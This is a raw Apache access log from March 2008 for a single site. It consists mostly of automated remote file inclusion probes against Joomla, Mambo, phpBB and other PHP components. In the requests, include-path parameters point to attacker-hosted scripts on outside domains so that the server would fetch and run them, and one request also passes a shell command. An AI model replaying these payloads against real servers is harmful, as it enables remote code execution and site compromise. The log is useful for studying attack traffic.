66.36.241.244 - - [25/Mar/2008:07:54:04 -0700] "GET /logs/access_080118.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [25/Mar/2008:07:54:05 -0700] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [25/Mar/2008:07:54:14 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [25/Mar/2008:07:54:14 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:07:54:17 -0700] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:07:54:22 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:07:55:28 -0700] "GET /logs/access_080118.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:07:55:28 -0700] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:07:55:55 -0700] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:07:56:18 -0700] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [25/Mar/2008:07:56:42 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.xplproxysx.kit.net/phpcmdxkn.txt?&cmd=cd%20id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:07:56:49 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:07:56:49 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:07:56:49 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:07:57:14 -0700] "GET /logs/access_080118.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:07:57:14 -0700] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:57:28 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:57:28 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:57:29 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:57:35 -0700] "GET /logs/access_080207.log//header.php?tpl_pgb_moddir=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:57:35 -0700] "GET //header.php?tpl_pgb_moddir=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:57:35 -0700] "GET /logs//header.php?tpl_pgb_moddir=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.36.241.244 - - [25/Mar/2008:07:57:44 -0700] "GET /logs/access_080221.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:57:59 -0700] "GET /logs/access_080207.log//header.php?tpl_pgb_moddir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:58:00 -0700] "GET //header.php?tpl_pgb_moddir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:58:00 -0700] "GET /logs//header.php?tpl_pgb_moddir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:07:58:15 -0700] "GET /logs/access_080118.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:07:58:15 -0700] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:58:25 -0700] "GET /logs/access_080207.log//header.php?tpl_pgb_moddir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:58:25 -0700] "GET //header.php?tpl_pgb_moddir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:58:26 -0700] "GET /logs//header.php?tpl_pgb_moddir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:58:37 -0700] "GET /logs/access_080225.log//header.php?tpl_pgb_moddir=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:07:58:50 -0700] "GET /logs/access_080221.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:07:59:05 -0700] "GET /logs/access_080225.log//header.php?tpl_pgb_moddir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:07:59:09 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:07:59:09 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:59:25 -0700] "GET /logs/access_080225.log//header.php?tpl_pgb_moddir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:07:59:40 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.210.71 - - [25/Mar/2008:07:59:52 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.61.37.111 - - [25/Mar/2008:08:00:06 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.21.178 - - [25/Mar/2008:08:00:28 -0700] "GET /bikes/?N=A HTTP/1.0" 200 2304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:00:45 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:00:45 -0700] "GET /index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:00:46 -0700] "GET /logs/index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:00:47 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:00:47 -0700] "GET /index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:00:48 -0700] "GET /logs/index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:00:51 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:00:53 -0700] "GET /index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:00:53 -0700] "GET /logs/index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:00:56 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:00:57 -0700] "GET /index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:00:57 -0700] "GET /logs/index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:01:01 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:01:08 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:01:10 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:01:10 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:01:10 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:01:37 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:01:37 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:01:38 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.175 - - [25/Mar/2008:08:02:39 -0700] "GET /bikes/cb750K6/?S=A HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.18.5.126 - - [25/Mar/2008:08:03:08 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
216.18.5.126 - - [25/Mar/2008:08:03:08 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:08:03:18 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.243.27.226 - - [25/Mar/2008:08:03:18 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.pnauk.org.uk/samPHPweb/common/metabase/metabase_pgsql??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.243.27.226 - - [25/Mar/2008:08:03:19 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.pnauk.org.uk/samPHPweb/common/metabase/metabase_pgsql??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.243.27.226 - - [25/Mar/2008:08:03:19 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.pnauk.org.uk/samPHPweb/common/metabase/metabase_pgsql??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.105 - - [25/Mar/2008:08:03:42 -0700] "GET /tmp/?N=D HTTP/1.0" 200 1319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:03:47 -0700] "GET /logs/access.log//atom.php5?page=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:03:47 -0700] "GET //atom.php5?page=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:03:48 -0700] "GET /logs//atom.php5?page=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.126.36.234 - - [25/Mar/2008:08:03:53 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [25/Mar/2008:08:03:53 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [25/Mar/2008:08:03:53 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.174.223.194 - - [25/Mar/2008:08:04:27 -0700] "GET /logs/index.php?option=com_docman&task=cat_view&gid=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
204.174.223.194 - - [25/Mar/2008:08:04:27 -0700] "GET /index.php?option=com_docman&task=cat_view&gid=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:04:36 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:04:36 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:04:36 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:08:04:42 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:08:04:42 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:04:45 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:04:45 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:04:45 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:04:48 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:04:48 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:04:48 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:05:00 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:05:00 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:05:00 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:05:19 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:05:34 -0700] "GET /logs/access_080127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:05:34 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.44.111 - - [25/Mar/2008:08:05:35 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:05:35 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.44.96 - - [25/Mar/2008:08:05:35 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.47.193.84 - - [25/Mar/2008:08:06:16 -0700] "GET /logs/access_080219.log//includes/functions_mod_user.php?phpbb_root_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.193.84 - - [25/Mar/2008:08:06:16 -0700] "GET //includes/functions_mod_user.php?phpbb_root_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.193.84 - - [25/Mar/2008:08:06:16 -0700] "GET /logs//includes/functions_mod_user.php?phpbb_root_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.193.84 - - [25/Mar/2008:08:06:17 -0700] "GET /logs/access_080201.log//includes/functions_mod_user.php?phpbb_root_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.48 - - [25/Mar/2008:08:06:57 -0700] "GET /logs/access.log HTTP/1.0" 200 221693 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:08:10 -0700] "GET /logs/access_080312.log/index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:08:23 -0700] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:08:23 -0700] "GET /logs/access_080312.log/index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.94.1.95 - - [25/Mar/2008:08:08:42 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://edu-web.eu/adds/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
87.94.1.95 - - [25/Mar/2008:08:08:42 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://edu-web.eu/adds/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.47.193.84 - - [25/Mar/2008:08:08:47 -0700] "GET //includes/functions_mod_user.php?phpbb_root_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:08:47 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:08:48 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:09:09 -0700] "GET /logs/access_080312.log/index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.18.5.126 - - [25/Mar/2008:08:09:19 -0700] "GET /logs//?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 40268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
